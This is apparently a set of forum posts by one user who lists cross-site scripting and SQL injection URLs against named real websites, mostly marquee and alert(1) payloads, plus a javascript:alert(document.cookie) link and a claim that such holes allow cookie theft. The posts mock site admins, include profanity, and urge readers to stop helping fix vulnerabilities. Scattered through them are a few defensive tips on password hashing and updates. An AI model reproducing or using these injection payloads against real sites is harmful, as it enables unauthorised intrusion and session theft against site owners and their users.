source

http://themespot.info/?page=theme&themeid=%22%3E%3Cmarquee%3Elolz xssssss

http://www.themafiaman.com/tru/board.php?brd=recruit&tru=10 http://www.themafiaman.com/tru/pimp.php?tru=10 both xssable I can't finish cause some stupid fuck face disabled my account. Anyway this is the LAST time you will see me make a post on these forums. I do not believe you should help admins fix security holes anymore. Open-source/full disclosure is bad. I discourage everyone from doing it. Agentsteal I hope you read this... Don't waste your time with this helping people fix security anymore. It's a complete waste of time. lolz

first hole is in the register on step three if you put ">code as ur last name hit enter it runs. http://www.themafiaman.com/signup.php?step=4&email=%22%3E%3Cmarquee%3Elolz&referer= http://www.themafiaman.com/signup.php?step=%22%3E%3Cscript%3Ealert(1);%3C/script%3E&email=lolwtf@aol.com&referer= http://themafiaman.com/signup.php?step=3&refer=%22%3E%3Cmarquee%3Elolz http://themafiaman.com/tru/board.php?tru=10&action=post xss in message... and I can make it link to say <a href="javascript:alert(document.cookie)">CLICK HERE</a>

http://www.cutencuddly.org/letter/index.php?c=%22%3E%3Cbr%3E%3Cbr%3E%3Ch1%3ESource%20Is%201337%3C/h1%3E%3Cmarquee%3Efucked%3C/marquee%3E%3Ch1%3Eweak%20sekurite%20admin xss hole / sql hole

dear admin: your security is a joke. you're not even using sessions.

http://games4uonline.com/mymail/index.php?message=%3Cp%20align=center%3E%3Cfont%20face=Verdana%20size=2%20color=AF0001%3E%22%3E%3Cmarquee%3Eowndage%3C/font%3E%3C/p%3E

if you link to a site that does not exist it will give you fclose errors or something like that try to link to http://www.djaODJSKdjasKDjSKDADjASDK.com

I could not see the main page...

uhm hi i think i just pwnd ur site.. like on every page it says "expecting ending </marquee>" sorry about this roflmaolollercoptter

criminals on the internet are using complex encryption methods..

" I took the time to look at what you've posted here, and I can't say I'm impressed. Most of it is talking down on noobs, and most of it is not exactly friendly. Surely this is going to invoke another of your friendly responses, but go ahead, I expect no less. It's not like you have added ANYTHING of value to this forum. You're just another unfriendly blip on the radar. " I do not talk down to noobs. I hardly ever write anything besides posting exploits in the site itself. Surely if you did not want another one of my friendly responses you would not have posted, and attempted to troll me. Now if you say I've added nothing to this forum then you are a complete tard and made a false statement in your first line in saying that you read all of my posts. Now, stop trolling me.

"Nice comeback !! lol" If only I *cared* or *liked* any of you. Or respected any one on these forums, with the exception of one person.

"virtually un crackable despite users pword strength" If you want true security you should be salting and md5ing/sha1 the passwords multiple times. Salt should be different for each user.

"Take a couple of breaths before you freak out. If the OP does not care much about XSS (granted that he shouldn't post here and is wasting everybody's time), his loss. Although I must agree that inserting a marquee is only a tiny exploit. Try stealing a cookie using JavaScript or by loading an external entity (i.e. an image), then he has something to worry about." {snip} If you can use <marquee> you can steal cookies.

same old same old: http://obb.awardspace.com/index.php?page=viewforum&forum=%22%3E%3Cmarquee%3Elolz http://obb.awardspace.com/index.php?page=viewforum&forum=2&row=-1 http://obb.awardspace.com/index.php?page=newreply&forum=2&topic=%22%3E%3Cmarquee%3Elolz http://obb.awardspace.com/index.php?page=viewforum&forum=2&sort='

if it's pre-made software then make sure it's up to date.

"find little expoits or w/e like what source got" *source coughs then highlights little a xss hole is NOT little. learn wtf you are talking about before you say "little"

yeah start making your code better...

http://sparkcash.net/inside/profile.php xss in multiple fields http://sparkcash.net/signup.php?r=%22%3E%3Cmarquee%3Eownd xss probably a lot i missed, posting on these forums is boring, same old exploits on different sites.

change the permissions on the directory. or add a password to it.

http://www.businesstips101.com/news/yourageinseconds2.php?name=%22%3E%3Cmarquee%3Eownd&bornmonth=1&bornday=1&bornyear=1&action2=Submit

http://www.zidub.com/searchinfo.php xssable http://www.zidub.com/register.php xssable by say, entering "><marquee>ownd as a username and just hitting enter. dont have much time tonite tho, i;ll look at it later.

http://speaker219.ath.cx:8080/URL-Encoder/test.php xss

agentsteal. IMO dropping your postcount to TEN is bullshit. I mean, you've contributed soo much to these forums.

I have found a cross site scripting vuln. When registering make your password <marquee>ownd and then register and on the next page where you echo the password it will echo. In short there should be no need for echoing the password. Ever.